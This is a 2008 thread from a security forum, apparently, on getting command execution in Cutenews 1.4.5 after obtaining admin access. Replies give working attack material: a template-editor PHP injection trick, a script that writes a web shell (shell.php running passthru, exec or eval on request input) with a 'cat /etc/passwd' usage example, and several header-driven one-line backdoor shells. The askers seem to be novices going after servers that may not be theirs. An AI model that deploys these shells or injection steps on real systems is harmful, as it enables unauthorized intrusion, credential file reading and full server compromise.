|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Cutenews 1.4.5 |
|
Posted: Fri Feb 01, 2008 9:22 pm |
|
|
tintin |
Beginner |
|
|
Joined: Feb 01, 2008 |
Posts: 4 |
Location: UK |
|
|
|
|
|
|
Is there any way to get config.php via control panel?
Thanks. |
|
|
|
|
|
Re: Cutenews 1.4.5 |
|
Posted: Fri Feb 01, 2008 10:00 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
tintin wrote: | Is there any way to get config.php via control panel?
Thanks. |
Get admin level, edit templates and inject php code, from there you can read/write any files, execute shell commands, etc ... |
|
|
|
|
Posted: Fri Feb 01, 2008 10:49 pm |
|
|
tintin |
Beginner |
|
|
Joined: Feb 01, 2008 |
Posts: 4 |
Location: UK |
|
|
|
|
|
|
yeah i got admin acesss level but what is the code? its my first time i trying to learn |
|
|
|
|
Posted: Sat Feb 02, 2008 9:44 pm |
|
|
givi |
Beginner |
|
|
Joined: Feb 02, 2008 |
Posts: 2 |
|
|
|
|
|
|
|
hi, i'v got admin Access too, and try to edit templates. But it's do not work! For example, after inserting code like this:
Code: | <?php echo 'Hello'; ?> |
it's don't work properly, but when i insert this:
Code: | <?php echo '<p>Hello</p>'; ?> |
i'ts print a message, so i think templates editing don't help here, because the code do not work.. Maybe i.m wrong, show me please how it's must be!
p.s sorry for my English. |
|
|
|
|
Posted: Sat Feb 02, 2008 9:56 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
You need to manipulate templates in proper way.
Go to template editor, select default template and let it be a part "Active News".
Insert this 2 lines in the end:
HTML;
phpinfo();
Save and then try to edit template again ... you should see phpinfo output. |
|
|
|
|
Posted: Sat Feb 02, 2008 10:48 pm |
|
|
givi |
Beginner |
|
|
Joined: Feb 02, 2008 |
Posts: 2 |
|
|
|
|
|
|
|
Oh Thank you! All work's fine, thank's one more |
|
|
|
|
Posted: Sun Aug 17, 2008 4:28 pm |
|
|
xxxmystikxxx |
Regular user |
|
|
Joined: Aug 17, 2008 |
Posts: 8 |
Location: C:/Lineage2/system/l2.exe |
|
|
|
|
|
|
waraxe wrote: | You need to manipulate templates in proper way.
Go to template editor, select default template and let it be a part "Active News".
Insert this 2 lines in the end:
HTML;
phpinfo();
Save and then try to edit template again ... you should see phpinfo output. |
I did it and saw php info but what i must do to see config.php .What code i must insert???? |
|
|
|
|
|
|
|
|
Posted: Sun Aug 17, 2008 5:58 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
xxxmystikxxx wrote: | waraxe wrote: | You need to manipulate templates in proper way.
Go to template editor, select default template and let it be a part "Active News".
Insert this 2 lines in the end:
HTML;
phpinfo();
Save and then try to edit template again ... you should see phpinfo output. |
I did it and saw php info but what i must do to see config.php .What code i must insert???? |
You need to insert shell and working via him. |
|
|
|
|
Posted: Sun Aug 17, 2008 6:56 pm |
|
|
xxxmystikxxx |
Regular user |
|
|
Joined: Aug 17, 2008 |
Posts: 8 |
Location: C:/Lineage2/system/l2.exe |
|
|
|
|
|
|
but how insert shell?And what shell is needed? |
|
|
|
|
Posted: Mon Aug 18, 2008 4:37 pm |
|
|
xxxmystikxxx |
Regular user |
|
|
Joined: Aug 17, 2008 |
Posts: 8 |
Location: C:/Lineage2/system/l2.exe |
|
|
|
|
|
|
Can anybody help with shell inserting?White manual please or give advise.. |
|
|
|
|
Posted: Mon Aug 18, 2008 7:45 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
Basic knowledge php,unix servers ..etc?I think you don't have any of this.Every guy hoo get access to some admin panel trying to destroy every server without any basic knowledge.You guy's don't have any desire to learn how all this working.This here is not kindergarden. |
|
|
|
|
|
|
|
|
Posted: Mon Aug 18, 2008 10:36 pm |
|
|
lenny |
Valuable expert |
|
|
Joined: May 15, 2008 |
Posts: 275 |
|
|
|
|
|
|
|
I agree, Koko. This is a security community, not for script kiddies.
But anyway, I won't judge you (mystik, givi or tintin... whoever you are) just for asking, so i will try and help.
Basically, you have permission to execute any PHP you desire. This means that with the help of a php shell such as the c99 shell or a custom shell.
I suggest you try this:
Quote: | <?php
$file = "<?php if ($_GET['type'] == 'passthru') {
echo passthru($_GET['cmd']); }
elseif ($_GET['type'] == 'exec') { exec($_GET['cmd']); }
elseif ($_GET['type'] == 'eval') { eval($_GET['cmd']); }
?>";
$targfile = "shell.php";
$filehandle = fopen($targfile , 'w');
fwrite($filehandle , $file);
fclose($filehandle );
?>
|
That should create a shell in its own file. Next, navigate to shell.php and give perameters:
shell.php?type=exec&cmd=cat /etc/passwd
Now, that is the very basics of shell usage... Im not even sure if it will work - I am *very* tired!
The shell I used in this example is the one I always tend to use on my own servers occasionally.
I can have a closer look if you would like, just PM me the URL
Tell us when you try it |
|
|
|
|
|
|
|
|
Posted: Tue Aug 19, 2008 4:54 am |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
lenny if admin of this server is not stupid he will find this shell after 5 min. |
|
|
|
|
|
|
|
|
Posted: Tue Aug 19, 2008 8:46 am |
|
|
xxxmystikxxx |
Regular user |
|
|
Joined: Aug 17, 2008 |
Posts: 8 |
Location: C:/Lineage2/system/l2.exe |
|
|
|
|
|
|
lenny wrote: | I agree, Koko. This is a security community, not for script kiddies.
But anyway, I won't judge you (mystik, givi or tintin... whoever you are) just for asking, so i will try and help.
Basically, you have permission to execute any PHP you desire. This means that with the help of a php shell such as the c99 shell or a custom shell.
I suggest you try this:
Quote: | <?php
$file = "<?php if ($_GET['type'] == 'passthru') {
echo passthru($_GET['cmd']); }
elseif ($_GET['type'] == 'exec') { exec($_GET['cmd']); }
elseif ($_GET['type'] == 'eval') { eval($_GET['cmd']); }
?>";
$targfile = "shell.php";
$filehandle = fopen($targfile , 'w');
fwrite($filehandle , $file);
fclose($filehandle );
?>
|
That should create a shell in its own file. Next, navigate to shell.php and give perameters:
shell.php?type=exec&cmd=cat /etc/passwd
Now, that is the very basics of shell usage... Im not even sure if it will work - I am *very* tired!
The shell I used in this example is the one I always tend to use on my own servers occasionally.
I can have a closer look if you would like, just PM me the URL
Tell us when you try it |
Parse error: syntax error, unexpected T_VARIABLE in C:\AppServ\www\news\data\Default.tpl on line 15
What i did wrong? |
|
|
|
|
|
|
|
|
Posted: Tue Aug 19, 2008 3:47 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
<? @passthru('cmd'); ?>
Working with method POST.Try to find in google or here where is difference between POST and GET method's.
...or this shell.WORKING WITH HEADER'S.
<?php @passthru(@getenv("HTTP_YOURFUCKINGWORD"));exit;?>
in header's
YOURFUCKINGWORD:ls -la
...same shitt
<?php $VR=@getenv('HTTP_VR');
if(strstr($VR,'V|R')=='V|R'){echo `$VR`;} ?>
header's
VR:ls -la
....same lamer's shell
<? if (@getenv(HTTP_koko)) {@passthru(@getenv(HTTP_koko));} else{phpinfo();} ?>
header's
koko:ls -la |
|
|
|
|
www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 2
Goto page 1, 2Next
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|